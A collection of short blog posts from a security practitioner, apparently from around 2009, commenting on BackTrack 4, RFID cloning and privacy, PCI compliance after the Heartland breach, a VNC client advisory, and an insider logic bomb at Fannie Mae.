Quick note that BackTrack 4 beta is publicly available now.
I-Hacked has a series of nice links on installing BackTrack 4 that I didn’t feel up to snagging and reposting here.
Quick note that BackTrack 4 beta is publicly available now.
I-Hacked has a series of nice links on installing BackTrack 4 that I didn’t feel up to snagging and reposting here.
In case someone has strangely missed this story, Chris Padget has made some headlines for a recent video where he reads and clones RFID tags around the San Francisco area. Read the comments for some good discussion (amidst the ignorant noise).
This is a very big issue for three reasons. First, obviously we need to care what may or may not be disclosed from the tags. Is it personal? Is it just a number that is looked up? This is probably the easiest issue to resolve.
Second, even if the item is just a number that is looked up, all it takes is some relatively simple database tracking or data points to start stumbling over the lines of privacy. #3482749 is Michael Dickey. #3482749 is shopping at Wal-Mart at 7:30pm. #3482749 stopped for a shake at McDonald’s at 8:15pm. And so on… And it wouldn’t take much to track this. If all the legit scanners that get issued are dumb but ping back to the master database system, the database just needs to log the location of the scanner that pinged in.
Third, just how easy is it to clone a tag and fool scanners? Kinda like me opening up a Facebook page for someone else, I might be able to do quite a bit of damage to someone’s profile or reputation by wandering around with a cloned ID just for the heck of it. Or maybe I’ll just clone my own and give it away on the streets and generate so much noise… In fact, how defensible would that tag information even be, legally, if I can generate doubt like that? Can I overpower my own RFID tag by transmitting a stronger signal and drown out my card?
Besides, let’s face it, as a shop owner I might want to buy some cheap RFID reader and put it near the front door just keep my own tabs on who my repeat visitors are based on their number. And it’s just a hop-step away from keeping a personal record of them so they can pay quicker by keeping their credit card on file and just charging them based on the number on the RFID. Come on, there’s a whole industry of people salivating at the possibilities of such tracking and ID…
And if “do no evil” Google will happily cross the line of privacy in pursuit of the profits, so too will others. It will just take some curious entity that is large enough to connect data points and suddenly that slippery slope is rushing by fast enough to burn our ass.
In short, it’s not just about the data given off by an RFID tag, but also how that data can be correlated. And how much the general public is made aware of the risks of unshielded tags or unquestioned tracking.
I’m a bit surprised to see talk of BackTrack4 since it seemed like BackTrack3 is barely a year old. Alas, a new version can only be a good thing! Shmoocon attendees got to check out a pre-release version and I wouldn’t be surprised if they did an IRC channel pre-release outing as well. Hopefully sometime soon BT4 will be widely released to the public or available to me via some other channels.
I had a few small quibbles about BT3 over BT2. I was unimpressed with the tossing away of the stealthy boot up. BT2 was very quiet on the wire, while my experiences with BT3 involved it starting up and immediately wanting an IP from the first network it saw. The BT3 hard disk installer was still pretty unintuitive, although the forums are invaluable for figuring it out.
BT4 goes back to the stealthy startup (omg newbies, you gotta start network!), and from what I gather will be much friendlier for a more permanent distro-like install (I’m assuming, here). I enjoy the livecd a lot, and someday I’m sure I’ll enjoy a USB install more, but some of us really don’t mind at all loading it on some older laptop for permanent use and tinkering. A vmware image as well? That might be worthy of a little jizz in my pants!
Anton Chuvakin posted over a week ago about some possible reasons why Heartland Payment Systems had their data breached. After his 5 examples, he concludes that none of them specifically follow that PCI failed or is irrelevent. In a way, he is correct, but what we’re doing here is playing with semantics vs perception. (Something we who throw around the term “hacker” often should be very intimate with.)
If PCI didn’t fail in any of those cases, one could argue that PCI will never fail us. That means PCI compliancy doesn’t offer much beyond any other list of Best Practices. Best Practices that are required. We’ve known for some time that PCI is just a general guideline. But there is either a perception problem on those adopting PCI, or a presentation problem by the PCI Gods that are requiring it.
If PCI can’t be blamed for anything, then what value is there? If PCI doesn’t allow a CTO to shift blame onto it (or a QSA) when things go wrong, there are plenty who then see no value in it. In which case it is just a requirement to meet in the least painful/costly fashion possible (which does not preclude simply lying about it). And then there truly is no value in it for those persons.
I don’t agree with that position, but it exists whether I like it or not.
Maybe the underlying concept we need to continue to hammer out is: Security is not easy.* Security is hard work. Security is not always cheap. Security costs money. I’m sure there is a haiku in there somewhere…
* Just think of all those painful experiences trying to align secure practices to people and a business. Years of those experiences, trying to guide the moving waters of a river to where you want them to flow. There are small and large security battles lost every day, and poor individual decisions made constantly and gambles accepted. We’re certainly not in it bcause the job is easy!
Thank you to Tyler (SSLFail.com) for posting that Jay Beale has (finally!) released The Middler (sorry, no front page discussing it, just a direct link). Released, but it looks like, upon a very quick glance, that it might not be nearly finished yet. The Middler was discussed at Defcon 16. It is a tool that can inject into http traffic between client and server, intercept and reuse session credentials, and more. In short, this is a tool that automates what many of us have known can happen when you’re on a non-trusted LAN. Only scarier. And more accessible.
By the way, props to Jay for apparently skipping ahead to the demos. There is a ton of information in his presentation and all of it relevent, but I was a bit disappointed in not seeing many demos at the Defcon talk. Despite that, his was one of the best talks I saw there!
Grats to Mubix on his OSCP! In his post he talks about how the OSCP won’t get anyone a job, and I think he’s 99% correct. However, the caveat to that is to anyone that would know what the OSCP is, it does have meaning. So the other 1% might be a manager who knows the OSCP and knows that anyone who has it probably has a certain level of geekery and interest in security beyond what even the CISSP will demonstrate (e.g. those sales people who are required to get CISSP and finally do so on their 6th try…). This is part of the reason I want to get back to the OSCP afer my ill-fated attempt last year (right when I got slammed with a coworker quitting). The other part being that it actually is freakin hands-on!
If you use a VNC product, more specifically UltraVNC or TightVNC (or others), you probably want to keep your eyes open for an upcoming new version of the client. Core released a VNC security advisory, and from the sound of it, a workable exploit is likely (hi Metasploit!).
Offsetting that risk, the exploit is on the client and not the server. This means an attacker has to not only get a workable exploit, but get a VNC user to connect to an untrusted or subverted VNC server. If you automatically have .vnc files mapped to the VNC client, this is where it might be useful for Metasploit to have a fake VNC server module to trick admins to connecting back to an attacker.
Now, I often get back to ideas on making a network more hostile to attackers, and this can be another opportunity, especially if a workable exploit is developed or released. Get your hands on a subverted VNC server, set it up in some dark space or honeypot area of your network and wait for someone attempt to connect.
We use a Cisco SSL VPN at work. One of the features we have turned on when a user connects is a keylogger scanner. It just scans and alerts, but takes no administrative action. This scan seems to be rebooting the client machine on a couple of our users, and we’re not yet sure why. While discussing this in a team meeting, my boss made mention that when the keylogger check runs on his system, it flags two benign files that are false positives. He clicks Ok and continues on. The question he raised is, “What value is this check giving us if users will just click through?”
I gave it some thought over lunch. The direct value may not be much. In fact, it may result in 0 improvement to users (since they won’t know what to do with the keylogger alerts) and may not prevent any infected systems from entering our network (users can just click through). If we turn on administrative action by the VPN client, obviously legitimate users will be denied ability to do work.
There are a few indirect values to still having the keylogger on, even if it ultimately fails.
1. The keylogger may log what it detects on and whom, so we have some statistics and auditing in case something bad happens, or someone else gets in.
2. Information is given to those few users who may investigate the issues and improve their knowledge and system health. Not doing alerts perpetuates ignorance.
3. We potentially can prevent bad systems from entering our network, or capturing login information. And let’s face it, logging our VPN IP and login information is instant ownage. This potentiality may be worth it alone.
Of course, there are costs which might outweight these indirect “vaules” that I see.
Ultimately, my boss mentioned in the meeting that it is clear that digital security is still not ready to be consumer-grade. And people certainly aren’t ready to handle it themselves, for the most part. I tend to agree with him. I prefer my controls to be transparent to users as much as possible, but as good as possible as well. Unfortunately, we won’t achieve security this way, but I feel the best returns are available on the technical side rather than relying on people.
I was going to shut up about Heartland, until I read Anton Chuvakin’s part III post which pointed me to a post by Verisign. After reading Verisign, read the other links Anton lists; at least one readdresses what struck me about Verisign’s post:
In our investigations of PCI related breaches, we have NEVER concluded that an affected company was compliant at the time of a breach. [emphasis theirs] PCI Assessments are point-in-time and many companies struggle with keeping it going every day.
Is there a problem with PCI? If there is one, the problem lies in the QSA community…, not the standard itself…
And Anton adds this, although I’m not sure if he’s being sarcastic or not:
Think about it! It was always either due to changes after an audit or due to an “easygrader” (or even scammer) QSA.
The above lines of thinking strike me as a dangerous place to tread. Fine, maybe we get it through enough heads that PCI is not and was never meant to be a perfect roadmap to perfect security and martinis on a tropical beach.
So we shift the “perfection” to be on the QSAs? Or maybe shift the “perfection” to be on the host company? Or shift the blame to PCI only being point-in-time (duh)? These are dangerous roads whose underlying assumption is that there is a state of security.
QSAs can only be as good as the standards, visibility, power, talent, and cooperation of the host customer. The host customer can only be as good as the talent, corporate culture/leadership, and budget (yeah, I said it!) allows them. PCI can only be as good as the authors and adherence to the spirit of the rules by the customer and QSA.
To me, this isn’t an easy answer, but I’d rather not throw blame around more than necessary. I can’t blame a QSA unless they are specifically negligent, because all QSAs will make a mistake at some point, even if that mistake is because the customer didn’t give them the necessary visibility or because of some brand new technology or 0day that no one has been testing for. In that situation, no QSA will ever measure up unless they are bleeding edge and do continuous testing/auditing.
If there is any place to lay blame, it has to end up on the shoulders of the corporate entities (or any entity). They ultimately are the place that holds the keys to the most variables. Indeed, the ultimate place that needs to make the fixes and demonstrate their commitment to security is the corporate entity. Even with the absence of PCI and QSAs, they still have to buck up.
Us technical geeks love solving problems, and we tend to see various things in the world as problems to be solved. We even argue amongst ourselves quite geekily from tech topics to religion to wars to rhetoric. We see everything as a problem that *must* have a solution out there. We immediately view any voiced opinion as a challenge to be overcome.
We probably all did some sort of logic puzzle books or crossword puzzle books as kids. But I wonder how different our worlds might be if not every puzzle in those books had a possible solution hidden away in the back.
This article on the continuing saga of the Heartland Payment System data breach falls under the category of, “…no shit, you make a great and obvious point! By the way, that’s egg dripping off your face, right?”
He has called for greater information sharing to prevent cyber-criminals from using the same or similar techniques in multiple attacks.
“I believe that had we known the details about previous intrusions, we might have found and prevented the problem we learned of last week,” [CEO Robert] Carr said.
Obviously I pine about this sort of thing regularly. I think Jericho put it best on the infosecnews mailing list:
Great! I’m glad to hear Mr. Carr is all about sharing information. I take it to mean that we will get the full story about what happened at Heartland first, to show that he is serious about sharing information. Afterall, by his reasoning, if he shares this type of information with the world, then he may help prevent another intrusion like it.
Lastly, Mr. Carr, I can point you in the direction of any number of people who know and can share details on how to be better with security, some of whom may be technical employees in your own business. Don’t spread the blame of personal and corporate ignorance across an entire industry (even if that is true, don’t dilute the issue of Heartland in particular). At some point, someone made a mistake, made a poor risk acceptance, or decided that feigned ignorance is best (a tactic we’re taught from childhood…). I don’t mind if those above possibilities are the real reason (it happens!), but I do mind when someone tries to avoid admitting as much.
And this story of a 14-year-old boy impersonating a police officer for 5+ hours falls into the category of, “…and this is why we try to take human judgement* out of security controls.”
One source said he was told the teenager “coded a couple of assignments” — meaning he used police codes to let a dispatcher know how he and his “partner” were handling particular calls. The source said he also was told the teen was allowed to drive the squad car.
He was allowed to do this because he was familiar with the protocols (how familiar does that sound to anyone knowledgeable about social engineering?) and because controls were skipped (roll call, etc). D’oh! Maybe this was a Superbad moment?
Side note: Why don’t more people do things like this? Like so many crimes, they are not terribly hard to commit. The hardest part is crossing that very distinct moral line we have between what is right and wrong. Peer pressure influences this line, as does mental stability or digital anonymity (or distance maybe). And once you cross that line once, crossing it again becomes easier (downware spiral of repeat offenders). We rely heavily on this line.
* Note that we try to do this, but obviously this cannot always be done and there will always be a need for human decision-making or agility. But we try to, because we know which one we can trust, when created and maintained properly.
This Wired article on a Fannie Mae logic bomb falls into the category of, “..and this is why we stress consistency in doing the simple things in security.”
On the afternoon of Oct. 24, he was told he was being fired because of a scripting error he’d made earlier in the month, but he was allowed to work through the end of the day…
Five days later, another Unix engineer at the data center discovered the malicious code hidden inside a legitimate script that ran automatically every morning at 9:00 a.m. Had it not been found, the FBI says the code would have executed a series of other scripts designed to block the company’s monitoring system, disable access to the server on which it was running, then systematically wipe out all 4,000 Fannie Mae servers, overwriting all their data with zeroes.
How many times is a termination handled like this? Probably more regularly than I’d like to know. And how many times does it take to cause a business some serious problems? Just once.
By the way, how many reasonable people would finish out their day at work after being terminated? Sure, plenty would, but man that is a horrible decision by HR/manager.